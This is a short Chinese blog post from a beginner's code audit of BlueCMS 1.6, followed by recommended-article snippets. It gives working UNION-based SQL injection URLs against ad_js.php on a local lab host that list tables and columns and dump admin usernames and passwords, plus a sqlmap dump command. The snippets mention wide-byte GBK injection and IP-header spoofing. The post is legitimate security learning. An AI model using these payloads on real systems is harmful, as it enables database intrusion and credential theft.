小白学习php代码审计,bluecms审计

于 2024-08-06 00:39:07 发布
阅读量137 收藏 1
点赞数 6
文章标签: 学习 代码复审 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43104689/article/details/140936525
版权

发现有sql查询语句,由get接受参数,然后没有过滤,也没有污点函数。

view-source:http://www.bluecms.com:8047/ad_js.php?ad_id=1%20UNION%20SELECT%201,2,3,4,5,6,%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()#

也可以用sqlmap梭哈,毕竟没过滤

python sqlmap.py -r CtfSqlmap.txt -D bluecms -T admin --dump

xi

view-source:http://www.bluecms.com:8047/ad_js.php?ad_id=1%20UNION%20SELECT%201,2,3,4,5,6,GROUP_CONCAT(column_name)%20FROM%20information_schema.columns%20WHERE%20table_schema=0x626C7565636D73%20AND%20table_name=0x61646D696E#(发现单引号被转义了,只能用十六进制转换了)

view-source:http://www.bluecms.com:8047/ad_js.php?ad_id=1%20UNION%20SELECT%201,2,3,4,5,6,GROUP_CONCAT(admin_name,pwd)%20FROM%20%20admin#

ikun6bu6
关注
  • 6
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
bluecms源码 初级代码审计
07-31
【标题】:“BlueCMS源码 初级代码审计”指的是对BlueCMS 1.6版本的源代码进行安全审查和分析的过程,这是针对初学者的一个学习项目,旨在帮助他们了解和掌握代码审计的基础知识。 【描述】:“BlueCMS 1.6源码 ...
PHPCodeReviwer:PHP代码审计小案例
04-30
PHP Code Reviwer关于本项目用于记录自己学习PHP代码审计的过程,时刻鞭策自己要不断的更新!!列表标题标签简介BlueCMS v1.6 sp1 ad_js.php SQL注入int型SQL注入变量过滤不严格导致SQL注入待办事项 PHP Security ...
php代码审计bluecms代码审计
qq_47289634的博客
09-22 293
加上pyload中的%df 后,就是 %df%5c%27 ,然后MySQL在使用GBK编码的时候,会认为两个字符为一个汉字, %df%5c就被解析为一个汉字,%27也就是单引号就成功逃逸了,成功实现闭合,后面就可以通过or 来执行语句了。继续跟进,看下values这些值里面有没有进行过滤,看到使用intval进行了转换,其他也都进行了防护,重点回到getip吧。可以看到本机ip也在里面,而client-ip是可以伪造的,上bp,评论,抓包,加个client-ip参数,发现可以修改。查看执行的sql语句。
Bluecms代码审计
末初的CSDN博客
03-17 2459
一次简单的代码审计实战来自风哥的一篇文章 这第一篇文章只是一个前言,第二篇文章是我看完风哥的审计过程,然后我自己审计的文章。 环境搭建 phpstudy BlueCMSv1.6sp源码 代码审计工具 总结功能点 BlueCMS本次代码审计实战靶场 拿到这样一个CMS我们首先应该对这个站的正常功能进行测试,看一看存在哪些功能,这里的测试方法是黑盒加白盒,以风哥的观点,挖掘漏洞的核心在于传参,知道了...
bluecms 代码审计
2202_75317918的博客
01-31 1027
第一次进行代码审计 ,参考的文章比较多我觉得工具只能起到辅助作用 主要自己要花时间研究发现一些问题时回溯变量,或者直接挖掘功能点的漏洞这里碰到的洞也不是那么高大上,基本都是一些比较基本的洞。
BlueCms 1.6代码审计之Union 注入
cj_Hydra's Blog
02-24 568
前言: 非常基础的代码审计练习的cms系统,适合有php基础的审计新手练习,当然了该套cms还有不少的其他漏洞,这里该篇文件只是介绍Union注入。 准备环境: phpstudy工具 BlueCms1.6源码 Sublime编辑器安装了Ctags插件 代码审计: 首先主页面index.php代码如下,可以看到开头便引用了2个文件,一个是include/common.inc.php和include/...
代码审计Bluecms v1.6
GKD2019的博客
07-25 672
act=do_info_edit Post提交post_id=1&title=1&content=1&cat_id=1&area=1&useful_time=1&is_recommend1=1&top_type=1&is_head_line=1&link_man=1&link_phone=1&att1=1&att2=1&top_type1=1&is_head_line1=1&lit_pic=1.php
7、Bluecms代码审计
Yzz_的博客
03-03 519
代码】7、Bluecms代码审计
bluecms代码审计入门
qq_42307546的博客
06-27 664
php
php代码审计bluecms
Zlirving_的博客
01-23 583
目录环境搭建开始找洞洞sql注入-1后台sql注入-2任意文件删除-1前后台广告功能xss-1先看后台再看前台 环境搭建 bluecms下载地址:http://down.chinaz.com/download.asp?id=26181&dp=1&fid=19&f=yes 作者用的是5.4.x的php版本,mysql数据库环境为GBK 安装好环境先,数据库用户名密码,跟本地数据库一致 还是利用seay自动审计一下,总的来说误报率还挺高… 开始找洞洞 sql注入-1 /bluecm
php代码审计思路,代码审计思路讨论
weixin_42561249的博客
04-02 547
原标题:代码审计思路讨论前言首先感谢手电筒的建议,建议我从Bluecms来开始学习代码审计。感谢桑桑格,风哥的问题解答。文章主要是写下我自己在代码审计的时候所思所想。当然并不是太过严谨,也有可能存在错误。这里主要是写出了审计SQL、XSS、CSRF、文件包含漏洞的思路。当然,还有比如变量覆盖,代码执行,逻辑漏洞,会话认证等等。以后有时间会整理。这里的思路是我自己的。当然也有大神有更好的想法。今后我...
bluecms-zzcms.rar
06-09
总的来说,通过对BlueCMS和ZZCMS的源代码审计,新手可以学习到如何识别和修复安全漏洞,了解最佳实践,并提升自己的编程技能。这种实践不仅有助于个人成长,也有助于整个Web开发行业的安全水平提升。
Bluecms内容管理系统 v1.6sp1
08-29
v1.6演示地址:http://www.bluecms.net/demo 官方网站:http://www.bluecms.net/ 官方论坛:htpp://www.bluecms.net/bbs
blue-cms源码全套
12-13
"蓝色CMS源码全套"是一个专为网络安全研究和代码审计学习设计的资源包。这个源码集合对初学者而言尤其有价值,因为它提供了实践和提升代码阅读及审计技能的机会。源码的完整性使得用户可以全面了解整个系统的工作...
从根儿上学习spring 五 之run方法启动第二段
baidu_19338587的博客
08-04 551
讲完了PropertySources和PropertySource,我们再回头看图6的方法configurePropertySources方法似乎变得很简单没必要一行行分析了吧,这个方法就是向environment的sources属性里加入启动时的两个PropertySource,有不清楚的同学再结合我上面说的对着代码看两遍就清楚了,我就不再赘述了。Environment接口继承了PropertyResolver接口,PropertyResolver接口主要提供了获取配置属性的方法,如图3所示。
学习笔记第十九天
最新发布
m0_69699758的博客
08-05 343
标准输入(stdin):默认是指键盘输入。标准输出(stdout):默认是指显示器输出。标准错误(stderr):用于输出错误信息,也是指向显示器,但与stdout不同,stderr通常是无缓冲的,以确保错误信息能立即显示。
从根儿上学习spring 三 之依赖注入原理了解
baidu_19338587的博客
08-04 356
举个例子,你为公司所有业务部门写了一个针对一些中间件优雅下线的通用功能,可你不确定后面公司业务部门会不会后面引入其它的中间件,所以你定义了一个接口GraceDownInteface,接口里定义一个下线方法,规定所有实现了该接口的方法在服务挂掉前都会被自动执行。前面的beanFactory和bean分别代表需要扩展的对象,BeanFactory是spring的 bean容器,bean就是spring创建的bean实例。针对上面的步骤我们都可以对其做扩展处理,并且可以在每步的前后都可以做扩展处理。
简单的docker学习 第8章 docker常用服务安装
qq_19342829的博客
08-05 949
b站docker学习笔记
bluecms网站搭建
04-09
BlueCMS是一种网站搭建系统,它提供了一个简单而强大的平台,用于创建和管理个人或企业网站。以下是关于BlueCMS网站搭建的一些介绍: 1. 界面友好:BlueCMS拥有直观的用户界面,使得网站搭建变得简单易用。无需编程知识,即可通过拖放、自定义模板等方式创建网站。 2. 多样化的模板:BlueCMS提供了丰富的模板库,包括各种行业和风格的模板,用户可以根据自己的需求选择合适的模板,并进行自定义修改。 3. 强大的功能:BlueCMS提供了许多功能模块,如文章管理、图片库、产品展示、在线留言等,用户可以根据自己的需求选择并添加这些功能模块到自己的网站中。 4. 响应式设计:BlueCMS支持响应式设计,可以自动适应不同设备上的显示效果,使得网站在手机、平板和电脑等不同终端上都能有良好的用户体验。 5. SEO优化:BlueCMS内置了一些SEO优化功能,如自定义URL、关键词优化等,帮助网站在搜索引擎中获得更好的排名。 6. 安全性:BlueCMS采用了一些安全措施,如防止SQL注入、XSS攻击等,保护网站的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值